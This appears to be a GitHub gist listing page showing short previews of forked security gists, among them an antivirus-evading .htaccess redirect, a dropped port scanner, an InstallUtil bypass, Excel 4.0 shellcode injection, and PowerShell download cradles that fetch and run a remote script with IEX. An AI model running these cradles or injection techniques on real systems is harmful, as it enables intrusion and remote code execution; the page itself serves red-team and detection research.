sasqwatch
/ AWS Security Resources
Created
July 24, 2019 21:53
— forked from chanj/AWS Security Resources
AWS Security Resources
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| INTRO | |
| I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute. | |
| Short Link: http://tiny.cc/awssecurity | |
| Official AWS Security Resources | |
| * Security Blog - http://blogs.aws.amazon.com/security/ | |
| * Security Advisories - http://aws.amazon.com/security/security-bulletins/ | |
| * Security Whitepaper (AWS Security Processes/Practices) - http://media.amazonwebservices.com/pdf/AWS_Security_Whitepaper.pdf | |
| * Security Best Practices Whitepaper - http://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf |
sasqwatch
/ .htaccess
Created
July 17, 2019 21:31
— forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__! | |
| # | |
| # Note this version requires Apache 2.4+ | |
| # | |
| Define REDIR_TARGET |DESTINATIONURL| | |
| RewriteEngine On | |
| RewriteOptions Inherit | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "Powershell": { | |
| "process_name": ["powershell.exe"] | |
| }, | |
| "Utilman": { | |
| "process_name": ["utilman.exe"] | |
| }, | |
| "msiexec": { | |
| "process_name": ["msiexec.exe"] | |
| }, |
sasqwatch
/ dropped_port_scanner.py
Created
June 13, 2019 17:50
— forked from aserper/dropped_port_scanner.py
dropped python portscanner
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python | |
| #coding: utf-8 | |
| import threading | |
| import socket | |
| from re import findall | |
| import httplib | |
| import os | |
| from random import randrange | |
| import random |
sasqwatch
/ foxyproxy.json
Created
June 12, 2019 22:55
— forked from liamosaur/foxyproxy.json
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "mode": "patterns", | |
| "proxySettings": [ | |
| { | |
| "address": "127.0.0.1", | |
| "port": 8080, | |
| "username": "", | |
| "password": "", | |
| "type": 1, | |
| "title": "127.0.0.1:8080", |
sasqwatch
/ DownloadCradles.ps1
Created
June 4, 2019 05:13
— forked from Heirhabarov/DownloadCradles.ps1
Download Cradles
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ################################################## System.Net. cradles ################################################## | |
| # System.Net.Webclient DownloadString | |
| IEX (New-Object Net.Webclient).DownloadString('https://gist.githubusercontent.com/Heirhabarov/69105374b08b12ab10f215b0923119d2/raw/45896b2561cc9c577378a630817078fbcd0588f4/TestPSScript.ps1') | |
| # System.Net.Webclient DownloadData | |
| IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('https://gist.githubusercontent.com/Heirhabarov/69105374b08b12ab10f215b0923119d2/raw/45896b2561cc9c577378a630817078fbcd0588f4/TestPSScript.ps1'))) | |
| $test = (New-Object Net.Webclient).DownloadData('https://gist.githubusercontent.com/Heirhabarov/69105374b08b12ab10f215b0923119d2/raw/45896b2561cc9c577378a630817078fbcd0588f4/TestPSScript.ps1'); $st = [System.Text.Encoding]::ASCII.GetString($test); IEX $st | |
| # System.Net.Webclient DownloadFile (touches disk) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Reflection; | |
| using System.Runtime.Hosting; | |
| public sealed class MyAppDomainManager : AppDomainManager | |
| { | |
| public override void InitializeNewDomain(AppDomainSetup appDomainInfo) | |
| { |
sasqwatch
/ event_data.ps1
Created
May 13, 2019 21:15
— forked from Beercow/event_data.ps1
Get data types for event logs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $provider = get-winevent -ListProvider * | |
| $Collection =@() | |
| foreach ($entry in $provider) | |
| { | |
| foreach ($object in $entry.events) | |
| { | |
| foreach ($log in $entry.LogLinks.LogName) | |
| { | |
| [xml]$data = $object.Template | |
| foreach ($DataType in $data.template.data.name) |
sasqwatch
/ gethelp.cs
Created
May 13, 2019 21:03
Help Me! MSDN InstallUtil - https://docs.microsoft.com/en-us/dotnet/api/system.configuration.install.installer.helptext?view=netframework-4.8
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
sasqwatch
/ Invoke-ExShellcode.ps1
Created
May 13, 2019 20:35
— forked from Philts/Invoke-ExShellcode.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Lateral movement and shellcode injection via Excel 4.0 macros | |
| Author: Philip Tsukerman (@PhilipTsukerman) | |
| License: BSD 3-Clause | |
| Based on Invoke-Excel4DCOM by Stan Hegt (@StanHacked) / Outflank - https://github.com/outflanknl/Excel4-DCOM | |
| #> | |
| function Invoke-ExShellcode | |
| { | |
| <# |